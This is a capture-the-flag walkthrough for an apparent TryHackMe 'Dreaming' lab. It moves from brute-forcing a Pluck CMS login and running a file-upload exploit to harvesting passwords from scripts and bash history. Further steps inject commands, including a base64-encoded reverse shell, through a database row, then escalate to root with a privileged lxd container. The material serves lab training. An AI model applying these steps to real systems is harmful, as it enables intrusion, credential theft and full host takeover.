First let's use rustscan to check for live ports on the target
# I use rustscan, you may use nmap
rustscan -a TARGET_IP -- -A -sC
# Expected Output
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 762667a6b0080eed34585b4e77459257 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDwLHu8L86UCKGGVbbYL07uBhmOh9hWLPtBknNwMgULG3UGIqmCT3DywDvtEYZ/6D97nrt6PpsVAu0/gp73GYjUxvk4Gfog9YFShodiB/VJqK4RC23h0oNoAElSJajjEq6JcVaEyub6w8Io50fk4nNhf8dPx0YSaRjKANr9mET6s+4cUNBAF/DknsZw6iYtafzxIQTAtgSX6AtXTXRf5cpdF02wwYvUo1jVSYdXL+Oqx19UADVhQib4Pt5gLAiwuFkoJjnN1L6xwkTjd+sUPVlhQ/6yHfB826/Qk55DWoUrnABfe+3jngyPvjl1heYDuPx01rtDvlDDGAwvriwR7XmX+8X7MZ9E9QOx/m2gEHZ83kuJ9jNLB6WjlqCyA4Zes+oHWbM9Q/nJ/UVQGdfcDS65edQ5m/fw2khqUbCeSFcuD3AQvUJvvFrfg/eTNnhpee/WYJjyZO70tlzhaT/oJheodQ1hQyfgnjwToy/ISHn9Yp4jeqrshBUF87x9kUuLV0=
| 256 523aad267f6e3f23f9e4efe85ac8425c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCmisKYJLewSTob1PZ06N0jUpWdArbsaHK65lE8Lwefkk3WFAwoTWvStQbzCJlo0MF+zztRtwcqmHc5V7qawS8E=
| 256 71df6e81f0807971a8da2e1e56c4debb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK3j+g633Muvqft5oYrShkXdV0Rjn2S1GQpyXyxoPJy0
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Seems, like only 2 ports are open.
When visiting the ip address on port 80, it's just a default apache page. Nothing interesting.
We now have an interesting endpoint /app let's take a look!
Hmmm, interesting.... once we visit the directory of pluck we get a welcome page along with a login page link. Please note that the version of pluck is 4.7.13
Since we don't know the password, neither do we have any breadcrumbs for password, we can try to use bruteforce to get the password, via burpsuite intruder.
I am using the rockyou.txt for buteforcing, Look out for response length 1464, you should have the password.
Once we have the correct password, lets checkout for some exsisting vulnerabilites on this particular version of Pluck.
# Use the searchsploit to get exploit information
searchsploit pluck 4.7.13
# Expected output
---------------------------------------------------------------------- ----------------------
Exploit Title | Path
---------------------------------------------------------------------- ----------------------
Pluck CMS 4.7.13 - File Upload Remote Code Execution (Authenticated) | php/webapps/49909.py
---------------------------------------------------------------------------------------------
Shellcodes: No Results
Papers: No Results
Initial Foothold
You may now copy the exploit code and run with following command!
Once we visit the page, you have webshell waiting for your commands. now what you can do is get a revershell back that way it will be much easier to control the system. Use the revshells.com
Now get a reverse shell
One thing to note is that you may need to use base64 encoding/decoding to inject a revershell via the web shell
Once we get inside, we need to find the first flag, but its read protected
We can look into /opt directory for usefull scripts that maybe helpful
total 16K
drwxr-xr-x 2 root root 4.0K Aug 15 12:45 .
drwxr-xr-x 20 root root 4.0K Jul 28 22:35 ..
-rwxrw-r-- 1 death death 1.6K Aug 15 12:45 getDreams.py
-rwxr-xr-x 1 lucien lucien 483 Aug 7 23:36 test.py
Interesting files!, lets check test.py
import requests
#Todo add myself as a user
url = "http://127.0.0.1/app/pluck-4.7.13/login.php"
password = "HeyLu#####REDACTED####!"
data = {
"cont1":password,
"bogus":"",
"submit":"Log+in"
}
req = requests.post(url,data=data)
if "Password correct." in req.text:
print("Everything is in proper order. Status Code: " + str(req.status_code))
else:
print("Something is wrong. Status Code: " + str(req.status_code))
print("Results:\n" + req.text)
we get the password for Lucien!, lets login using ssh and get our flag
Check if there is any program that can be run as root to get an easy hack.
sudo -l
## Expected Output
lucien@dreaming:~$ sudo -l
Matching Defaults entries for lucien on dreaming:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User lucien may run the following commands on dreaming:
(death) NOPASSWD: /usr/bin/python3 /home/death/getDreams.py
So we can run a python script without any password using sudo!
Now let's check the other file in the /opt folder!
cat /opt/getDreams.py # we can assume a copy of this script is being used
import mysql.connector
import subprocess
# MySQL credentials
DB_USER = "death"
DB_PASS = "#redacted"
DB_NAME = "library"
import mysql.connector
import subprocess
def getDreams():
try:
# Connect to the MySQL database
connection = mysql.connector.connect(
host="localhost",
user=DB_USER,
password=DB_PASS,
database=DB_NAME
)
# Create a cursor object to execute SQL queries
cursor = connection.cursor()
# Construct the MySQL query to fetch dreamer and dream columns from dreams table
query = "SELECT dreamer, dream FROM dreams;"
# Execute the query
cursor.execute(query)
# Fetch all the dreamer and dream information
dreams_info = cursor.fetchall()
if not dreams_info:
print("No dreams found in the database.")
else:
# Loop through the results and echo the information using subprocess
for dream_info in dreams_info:
dreamer, dream = dream_info
command = f"echo {dreamer} + {dream}"
shell = subprocess.check_output(command, text=True, shell=True)
print(shell)
except mysql.connector.Error as error:
# Handle any errors that might occur during the database connection or query execution
print(f"Error: {error}")
finally:
# Close the cursor and connection
cursor.close()
connection.close()
# Call the function to echo the dreamer and dream information
getDreams()
As per the code, we don't have the password for the user death, but if you look closely there is a for loop from line 37-42 which prints the data from the database, we need to hijack the process there.
What we can simply do is use a bash payload in the library database, itself so when it prints the data, it will terminate the line and execute our payload.
But first we need to get the password for the database! the best place to look for is the .bash_history file.
cat /home/lucien/.bash_history
# expected output
...
clear
clear
su root
cd ~~
cd ~
clear
ls
mysql -u lucien -plucie####REDACTED####
ls -la
cat .bash_history
cat .mysql_history
clear
ls
ls -la
rm .mysql_history
clear
...
As you can see, after the -p argument there is a password, lets use that to connect to the library database.
mysql -u lucien -p -D libary # since the DB_NAME in the script is for library
# Get the tables
mysql> show tables;
+-------------------+
| Tables_in_library |
+-------------------+
| dreams |
+-------------------+
1 row in set (0.00 sec)
# Check the data
mysql> select * from dreams;
+---------+------------------------------------+
| dreamer | dream |
+---------+------------------------------------+
| Alice | Flying in the sky |
| Bob | Exploring ancient ruins |
| Carol | Becoming a successful entrepreneur |
| Dave | Becoming a professional musician |
+---------+------------------------------------+
4 rows in set (0.00 sec)
# Now Let's append our bash payload to check if it works or not
mysql> insert into dreams (dreamer,dream) values ("payload",";id");
Query OK, 1 row affected (0.01 sec)
Now execute the script like this
sudo -u death /usr/bin/python3 /home/death/getDreams.py
lucien@dreaming:~$ sudo -u death /usr/bin/python3 /home/death/getDreams.py
Alice + Flying in the sky
Bob + Exploring ancient ruins
Carol + Becoming a successful entrepreneur
Dave + Becoming a professional musician
payload +
uid=1001(death) gid=1001(death) groups=1001(death)
As you can see along with the data, we can execute our bash payloads!
Time to pivot, use the revshells.com to generate a reverse shell payload, select the encoding as base64.
Now do the same like previously, login to database and insert the payload like the following
mysql> insert into dreams (dreamer,dream) values ("payload",";echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvd#######MjU1LzY5IDA+JjE=|base64 -d|bash");
And open the netcat listener in your own machine and execute the script again to get the shell!
Get the flag!
Intended Path - Hack Morpheus
Let's get back to /home/morpheus check for files that we can read or write to.
As you can see, there is restore.py python script, let's investigate!
from shutil import copy2 as backup
src_file = "/home/morpheus/kingdom"
dst_file = "/kingdom_backup/kingdom"
backup(src_file, dst_file)
print("The kingdom backup has been done!")
The program makes a backup copy of a file, but uses a library shutil.
We can check if we have any read or write privileges on that library itself.
Open your netcat/pwncat listner, and wait for the shell.
Get the Flag!
Since I didn't want this writeup to be long, let's try to get root and leave the rest of the users and other enumeration.
If we use id command we can see that our user lucien is in lxd group, we are in luck!
lucien@dreaming:/home$ id
uid=1000(lucien) gid=1000(lucien) groups=1000(lucien)....117(lxd)
Use the following command on your own machine, to create an alpine image!
sudo su
#Install requirements
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
#Clone repo
git clone https://github.com/lxc/distrobuilder
#Make distrobuilder
cd distrobuilder
make
#Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
#Create the container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18
Then, upload to the vulnerable server the files lxd.tar.xz and rootfs.squashfs
Add the image:
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list #You can see your new imported image
Once done, if you see your image listed we are good to go for the next few steps!
lxc init # it will ask you a couple of questions just keep hiting return
lxc init alpine privesc -c security.privileged=true
lxc list #List containers
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
If you find this error Error: No storage pool found. Please create a new storage pool
Run lxd init and repeat the previous chunk of commands
Execute the container:
lxc start privesc
lxc exec privesc /bin/sh
cd /mnt/root # this where the main filesystem is mounted
Get Death Flag
Since you have the root permission you have the freedom to read any files of any users!
# Death Flag
root@dreaming:/home# cat /home/death/death_flag.txt
THM{1M_TH3R3_####REDACTED#####}
Get Morpheus Flag
# Morpheus Flag
root@dreaming:/home# cat /home/morpheus/morpheus_flag.txt
THM{DR34MS_####REDACTED#######}
Unintended Path - Get Root and other flags! ( Patched!!!! )
Thank you for reading! Keep Learning & Happy Hunting!
